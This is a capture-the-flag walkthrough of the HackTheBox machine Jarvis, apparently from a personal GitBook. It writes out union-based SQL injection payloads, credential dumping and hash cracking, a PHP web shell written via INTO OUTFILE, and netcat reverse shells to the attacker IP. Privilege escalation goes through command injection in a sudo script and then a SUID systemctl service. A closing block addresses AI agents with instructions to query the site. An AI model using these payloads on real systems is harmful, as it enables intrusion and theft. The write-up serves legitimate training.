# Jarvis This is a medium difficulty Linux machine from [HackTheBox](https://app.hackthebox.com/machines/37) created by manulqwerty and Gh0spp7. In this scenario, my IP is 10.10.14.56 and the target’s IP is 10.129.16.167 ### Gathering Information Before doing anything, always start using ping to see if this is working {% code title="Local Terminal" %} ```bash ping -c 1 10.129.16.167 ``` {% endcode %}

TTL is around 63, so it’s a Linux Machine

Using nmap, we are going to Scan all open ports (-p- –open) with the highest speed (T5) without DNS resolution (-n), if you want more speed, you can use **nmap -p- -sS –min-rate 5000 --open -vvv -n -Pn 10.129.16.167**, suggestion by [S4vitaar](https://www.twitch.tv/s4vitaar). {% code title="Local Terminal" %} ```bash nmap -p- --open -T5 -v -n 10.129.16.167 ``` {% endcode %}

Now we want to gather aditional information by using nmap’s default scripts {-sC} with detailed versions {-sV} {% code title="Local Terminal" %} ```bash nmap -sC -sV -p 22,80,64999 10.129.16.167 ``` {% endcode %}

The important information is, **port 80 http open**, there is a website working using Apache, and in the port 64999 there is another website, we need more details of boths. {% code title="Local Terminal" %} ```bash whatweb http://10.129.16.167 ``` {% endcode %}

{% code title="Local Terminal" %} ```bash whatweb http://10.129.16.167:64999 ``` {% endcode %}

From both, the relevant information is { Email : }, now we are going to open the browser and check the website, to explore and check if there is a vulnerable URL. * Browser: If you pick a room, you will see that the URL has a modifiable parameter to explore each room type, let’s try with two thing, first, what happen if you use an invalid number, and then try SQL Injection by adding ” or 1=1 -- -” at the URL.

* Browser or 1=1 -- - * This one show information, it is a good signal * Browser: order by 1-- - * Tried with order by from 1 to 9, but nothing happens. * Browser: union select 1,2,3,4,5,6,7-- - * It shows information if you try by selecting every column until 7.

website’s output by using select from 1 to 7

* Browser: union select 1,2,NULL,4,5,6,7-- - Ok, there is no doubt that this website is vulnerable to SQL Injection, now we are going to test what kind if information we can gain from it. * Browser: union select 1,2,”test”,4,5,6,7-- -

* Browser: union select 1,2,database(),4,5,6,7-- -

* Browser: union select 1,2,version(),4,5,6,7-- -

* Browser: union select 1,2,user(),4,5,6,7-- -

union select 1,2,load\_file(“/etc/passwd”),4,5,6,7-- - Press **CTRL + U** to visualize the information in a friendlier format

loaded file with CTRL+U, There are two user with bash available

In some cases, many string are in a black list, so you can use **echo “/etc/passwd” | tr -d ‘\n’ | xxd -ps** and paste the output with 0x to avoid these situation, the result will be like: ** union select 1,2,load\_file(“0x2f6574632f706173737764”),4,5,6,7-- -** #### Exploitation Brow: union select 1,2,schema\_name,4,5,6,7 from information\_schema.schemata limit 0,1-- -

Here you have to test with other limits, like limit 1,1 or 2,1 or ..., because the row only allows one word, or use the command group\_concat(schema\_name) * Browser: union select 1,2,table\_name,4,5,6,7 from information\_schema.tables where table\_schema=”hotel” limit 0,1-- -

* Browser: union select 1,2,group\_concat(column\_name),4,5,6,7 from information\_schema.columns where table\_schema=”hotel” and table\_name=”room” limit 0,1-- -

From this table, we can get the information of every room, you can use sqlmap to get the same information, details at the bottom. * Browser: union select 1,2,group\_concat(User,0x3a,Password),4,5,6,7 from mysql.user-- -

This information is relevant, now we have the credentials of the administrator, but we have to decrypt it {DBadmin:\*2D2B7A5E4E637B8FBA1D17F40318F277D29964D0} * Browser:

If the hash is more complex and it's not in crackstation.net, you can use at your terminal the command **hashid** and **hash-identifier** to get the type, and then **hashcat -m 300 -a 0 hash.txt /usr/share/wordlists/rockyou.txt**, at hash.txt it's the target hash and -m is "mode", 300 = MySQL4.1 #### MACHINE RESET - NEW IP (**10.129.212.38**) Now that we have the username and password of the administrator, we need a place to login, and nmap can help us with it. {% code title="Local Terminal" %} ```bash nmap –script http-enum -p80 10.129.212.38 ``` {% endcode %}

PhpMyAdmin is an important place to test the new user and password, open your browser and go to

This is extremely important, we can use SQL queries to get information about the host. Example of what we can do:

* Browser:

But enough exploration, now that we have admin permission we can do the following step to connect to the machine * Browser: union select 1,2,”\”,4,5,6,7 into outfile “/var/www/html/testing.php”-- - * Browser:

We can execute commands, so we are going to create a reverse shell by using RCE. * Browser: union select 1,2,”\”,4,5,6,7 into outfile “/var/www/html/CMD.php”-- - * Browser:

The slot 3 disappeared, and now we can control the output with adding ?cmd=**COMMAND** at the url * Browser:

So, now we want to control with a bash terminal, we need to do two steps. {% code title="Local Terminal" %} ```bash nc -nlvt 443 ``` {% endcode %} * Browser: nc * To check if exist * Browser: -e /bin/bash 10.10.14.56 443

We are in, so now we need only an [TTY treatment](/cybersecurity/cybersecurity/tip-and-tricks/bash-upgrade.md) to have a functional shell with shortcuts. {% code title="Target Terminal" %} ```bash cd /home/pepper ls -l ``` {% endcode %}

As you can see, as the current user, we cant open the archive user.txt

{% code title="Target Terminal" %} ```bash id sudo -l ``` {% endcode %}

We are user www-data, a simple guess, But with the current user we have all the access to the file **simpler.py** {% code title="Target www-data" %} ```bash sudo -u pepper /var/www/Admin-Utilities/simpler.py ``` {% endcode %}

{% code title="Target www-data" %} ```bash vi pepper /var/www/Admin-Utilities/simpler.py ``` {% endcode %}

Looks like a test and defense system, and the section of the image, looks like a simple exploitable function, first we need to create an script file. {% code title="Target www-data" %} ```bash cd /tmp/ vi reverse.sh ``` {% endcode %} {% code title="reverse.sh" %} ```bash #!/bin/bash nc -e /bin/bash 10.10.14.56 443 ``` {% endcode %} {% code title="Target www-data" %} ```bash chmod +x reverse.sh ``` {% endcode %} Now open a new Local Terminal, because the file reverse.sh will connect to that terminal {% code title="Local Terminal" %} ```bash nc -nlvp 443 ``` {% endcode %} {% code title="Target www-data" %} ```bash sudo -u pepper /var/www/Admin-Utilities/simpler.py -p ``` {% endcode %} {% code title="Target Simple.py" %} ```bash $(bash /tmp/reverse.sh) ``` {% endcode %}

Now the second terminal is a new Victim-Bash with the user Pepper, follow the same[ tty treatment](/cybersecurity/cybersecurity/tip-and-tricks/bash-upgrade.md). {% code title="Target Pepper" %} ```bash cd ls cat user.txt ``` {% endcode %}

#### Privileges Scalation For Privileges Scalation, a good practice is to find a custom command or something weird to abuse. {% code title="Target Pepper" %} ```bash cd .. cd .. id find \-perm -4000 2>/dev/null ``` {% endcode %}

By executing this command from the root folder, you can see the files with high privileges, in this case, **systemctl** is our target. With this we can restart the system with an added command.

{% code title="Target Pepper" %} ```bash cd privesc cp /tmp/reverse.sh privesc.sh ``` {% endcode %} Remember to modify the file privesc.sh to the **port 444**, we don’t want to interrupt the current working port.

{% code title="Target Pepper" %} ```bash nano privesc.service ``` {% endcode %}

Open a new terminal, and prepare to connect with: nc -nlvt 444 {% code title="Local Terminal" %} ```bash nc -nlvt 444 ``` {% endcode %} {% code title="Target Pepper" %} ```bash systemctl link /home/pepper/privesc/privesc.service systemctl enable –now /home/pepper/privesc/privesc.service ``` {% endcode %}

Now you are connected as root. {% code title="Target Root" %} ```bash /dev/null -c bash ls cd root ls cat root.txt ``` {% endcode %}

### Alternative: SQLmap At the SQL step, another option is to use sqlmap, first get the cookie from the website.

{% code title="Local Terminal" %} ```bash sqlmap -u http://10.129.16.167/room.php?cod=1 --cookie=’PHPSESSID=sc0us610ooevshi902rqdq98d4′ --dbs ``` {% endcode %}

{% code title="Local Terminal" %} ```bash sqlmap -u http://10.129.16.167/room.php?cod=1 --cookie=’PHPSESSID=sc0us610ooevshi902rqdq98d4′ -D hotel -tables ``` {% endcode %}

sqlmap output, there is one table at the hotel DB

{% code title="Local Terminal" %} ```bash sqlmap -u http://10.129.16.167/room.php?cod=1 --cookie=’PHPSESSID=sc0us610ooevshi902rqdq98d4′ -D hotel -T room --dump ``` {% endcode %}

Now, go to that location and see the file or move to your current location with: **mv /home/robertoalfaro/.local/share/sqlmap/output/10.129.16.167/dump/hotel/room.csv .**

You can do the same to get the credentials at the database named “mySQL” --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://robertos-notebook.gitbook.io/cybersecurity/hack-the-box/old-machines/medium-machine/jarvis.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.